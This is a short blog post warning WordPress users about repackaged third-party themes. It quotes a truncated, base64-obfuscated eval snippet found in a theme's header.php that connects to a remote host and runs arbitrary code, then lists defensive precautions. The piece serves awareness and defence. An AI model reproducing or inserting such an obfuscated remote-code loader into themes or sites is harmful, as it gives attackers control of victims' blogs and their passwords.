Most people know about the dangers of installing software from untrusted sources, but you might not be in the same mindset when downloading themes or plugins for your blog.

One of the great things about Wordpress is that there’s a huge number of themes, widgets and plugins available. But the problem is, every single one of them is written in PHP and could potentially cause all manner of trouble.

Derek at 5thirtyone.com discovered exactly that when he got a support request for one of his own Wordpress themes. The user had downloaded the theme from a third party site and had a question about some code in header.php:

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\

When decoded, this code tries to connect to a remote server and then exectute arbitrary code on your blog. That could mean anything from tracking your stats to stealing passwords or simply deleting your entire blog.

So how do you protect your blog against this kind of thing? Well by taking a few very simple precautions, you should be safe:

  • Only download themes from the original author or wordpress.net
  • Read through the php code before installing your theme. Be especially wary of any eval or base64_decode statements within themes. This is usually used by someone trying to hide what the code is really doing.
  • If you’re not a PHP person, get someone who is to check the code.
  • Google anything you’re not sure of. That includes the theme name, the author and any php commands you don’t understand.
  • If something doesn’t look right, don’t be afraid to drop the original author an email. They might not have time to respond, but they will almost certainly thank you if you find someone else is repackaging and redistributing their theme. Especially if they’re adding potentially malicious code like this.

Finally, I’d just like to say that Wordpress is a wonderful blogging platform that often gets a bad press that’s undeserved - usually as a result of poorly written third party code or unsuitable hosting. In terms of features and extendability, it’s unmatched. If you’re not using it, you should be.

[Thanks Pewari]

Subscribe to Money Blogger for more tips.

Share this post on: